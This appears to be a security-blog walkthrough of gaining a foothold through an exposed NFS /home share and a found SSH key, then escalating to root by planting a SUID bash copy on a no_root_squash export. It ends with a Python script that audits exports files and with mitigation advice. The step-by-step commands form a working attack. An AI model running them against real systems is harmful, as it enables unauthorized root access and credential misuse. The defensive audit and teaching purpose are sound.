Gaining Root Access via NFS Misconfiguration
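After gaining low-privilege access by enumerating NFS shares, a misconfiguration is exploited to upload a modified bash binary with the SUID bit set, ultimately obtaining root privileges.
2025-9-7 15:25:28 Author: infosecwriteups.com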

Initial Access

Before we escalate privileges, we first need to get access to the target machine. Let’s begin by enumerating the NFS shares.

Step 1: Enumerate NFS Shares

First, we need to check if the NFS service is running on the target machine. NFS usually runs on port 2049, so we can scan for it using Nmap:

nmap -p 2049 <target-ip>

If the port is open, we can list the shared directories using the following command:

/usr/sbin/showmount -e <target-ip>

This will display the available shared directories. In our case, we discover that /home is shared.

Step 2: Mount the Shared Directory

To access the shared directory from our attacking machine, we first create a mount point:

mkdir /tmp/mount

Then, we mount the shared directory:

sudo mount -t nfs <target-ip>:/home /tmp/mount -o nolock

Now, we can browse the shared files in /tmp/mount/.

Step 3: Searching for Sensitive Information

Once inside the shared directory, we look for files that could help us gain access to the target machine. Common things to check:

  • SSH private keys
  • User credentials
  • Executable files with misconfigured permissions

In our case, we find an SSH private key, which can be used to access the system. To use the key, we modify its permissions and connect to the target machine:

chmod 600 <key-file>
ssh -i <key-file> <username>@<target-ip>

At this point, we have low-privilege shell access!

Privilege Escalation via NFS Misconfiguration

Now that we have a user shell, we need to escalate our privileges to root.

Step 1: Download Bash Executable

On our attacking machine, we copy the bash binary from the target machine to our local system using SCP:

scp -i <key-file> <username>@<target-ip>:/bin/bash ~/Downloads/bash

Step 2: Copy Bash to the Shared Directory

Next, we place the copied bash binary into the shared NFS directory:

cp ~/Downloads/bash /tmp/mount/

Step 3: Add SUID Bit to Bash

We set the SUID bit on the bash executable so that it will run with elevated privileges when executed:

sudo chmod +s /tmp/mount/bash

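This step exploits the NFS misconfiguration where root squash is disabled (the no_root_squash export option). With root squash disabled, the server does not map requests from a client's root user to an unprivileged account, so any changes we make as root to files on the NFS share from our machine retain their ownership and permissions, including the SUID bit, when accessed on the target machine.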

Step 4: Log in to the Target Machine

We SSH back into the target machine:

ssh -i <key-file> <username>@<target-ip>

Once inside, we navigate to the shared directory (/home on the target) and verify the permissions of our modified bash file:

ls -l /home/bash

We should see an s in the permissions, indicating that the SUID bit is set:

-rwsr-sr-x 1 root root 1183448 Feb  3 12:00 bash

Step 5: Execute Bash with Elevated Privileges

To gain root access, we simply execute the modified bash file with the -p flag, which stops bash from dropping the effective user ID granted by the SUID bit:

./bash -p

Boom! We now have a root shell.

whoami
root
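
From the defender's side, the condition this escalation depends on, an export with root squash disabled, can be found by auditing /etc/exports on the NFS server. The Python below is an added example, not part of the original write-up; the sample exports file, the addresses and the function names are constructed for illustration, and it assumes a later option overrides an earlier one.

```python
# Constructed sample in exports(5) syntax; not taken from the write-up's target.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home        *(rw,sync,no_root_squash)
/srv/backup  192.0.2.5(rw,sync) \\
             192.0.2.6(ro,no_root_squash)
/srv/pub     -ro,all_squash *
/srv/build   -rw,no_root_squash 192.0.2.7 192.0.2.8(root_squash)
/srv/tmp     (rw,no_root_squash)
"""


def setting(options, on, off, default):
    """Effective value of an on/off pair; assumes a later option overrides an earlier one."""
    for opt in options:
        if opt in (on, off):
            default = opt == on
    return default


def audit_exports(text):
    """Return (path, client, writable) for each export that trusts remote root."""
    findings = []
    # Join backslash-continued lines, then drop comments and blank lines.
    for line in text.replace("\\\n", " ").splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        path, defaults = fields[0], []
        for field in fields[1:]:
            if field.startswith("-"):  # "-opts": defaults for the clients that follow
                defaults = field[1:].split(",")
                continue
            host, _, opts = field.partition("(")
            options = defaults + [o for o in opts.rstrip(")").split(",") if o]
            # root_squash is the default; only an explicit no_root_squash disables it.
            if not setting(options, "root_squash", "no_root_squash", True):
                # An empty host, as in "(rw)", means any client.
                findings.append((path, host or "*", setting(options, "rw", "ro", False)))
    return findings


if __name__ == "__main__":
    for path, client, writable in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: no_root_squash, {'rw' if writable else 'ro'}")
```

Entries reported as writable are the ones where the SUID technique in this walkthrough applies. Removing no_root_squash restores the root_squash default, and mounting the exported filesystem with nosuid on the server stops setuid bits from being honoured there.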

Source: https://infosecwriteups.com/gaining-root-access-via-nfs-misconfiguration-92d4d44f8837?source=rss----7b722bfd1b8d---4